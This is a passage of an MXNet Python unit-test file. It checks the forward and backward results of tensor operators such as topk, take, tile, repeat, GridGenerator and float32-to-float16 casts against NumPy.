mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
# Test monitor on symbol using clip
def simple_callback(name, arr):
pass
exe = test.simple_bind(ctx=mx.current_context(), data=shape)
exe.set_monitor_callback(simple_callback, monitor_all=True)
exe.forward(is_train=True)
exe.backward(out_grads=mx.nd.ones(shape))
mx.nd.waitall()
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
@with_seed()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
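# gt_topk builds the ground truth from numpy's argsort/sort: ascending results take the
# first k entries, descending results take the last k in reverse via negative indices
# with mode='wrap'. The "mask" branch instead scatters ones at the selected positions
# (only supported here for the fixed (5, 5, 5, 5) shape).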
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
@with_seed()
def test_take():
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
def check_output_n_grad(data_shape, idx_shape, axis, mode, out_of_range=True):
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
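                # Note: replacing zeros with 1 and then scaling by the axis length pushes
                # every index outside [0, data_shape[axis]), so the forward pass below is
                # expected to raise MXNetError when mode='raise'.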
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def check_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
for mode in ['clip', 'wrap', 'raise']:
for data_ndim in range(1, 5):
for idx_ndim in range(1, 4):
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
if mode == 'raise':
check_output_n_grad(data_shape, idx_shape, axis, 'raise', False)
check_output_n_grad(data_shape, idx_shape, axis, mode)
check_autograd_req()
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
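        # Expected gradient w.r.t. the affine parameters: each normalized output point is
        # A @ [x_t, y_t, 1]^T, where (x_t, y_t) are the target coordinates mapped to [-1, 1].
        # Hence dL/dA = dL/dout (2 x H*W) @ [x_t; y_t; 1]^T (H*W x 3); the rows of `tmp`
        # below are exactly those normalized x coordinates, normalized y coordinates, and ones.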
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
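        # For the warp transform the output is (flow + pixel grid) rescaled to [-1, 1],
        # i.e. multiplied by 2/(W-1) along x and 2/(H-1) along y, so the gradient w.r.t.
        # the flow is simply the output gradient divided by (W-1)/2 and (H-1)/2.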
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
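    # Illustrative note: float16 has 10 fraction bits, so within a binade adjacent
    # representable mantissas differ by 2**-10; stepping `fraction` in units of 2**-11
    # therefore lands alternately on representable float16 values and on the exact
    # midpoints between them, while `small_delta` (one float32 ulp) nudges the value
    # just below or above each midpoint to exercise round-to-nearest-even.
    # For example, 1 + 2**-11 = 1.00048828125 lies midway between the float16 values
    # 1.0 and 1.0009765625, and the tie should round to 1.0 (even mantissa).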
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# This test requires all platforms to round float32->float16 with the same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
if default_context().device_type == 'gpu':
check_cast(mx.sym.amp_cast, input_np, expected_output)
@with_seed()
def test_amp_multicast():
if default_context().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
@with_seed()
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z.bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z.bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
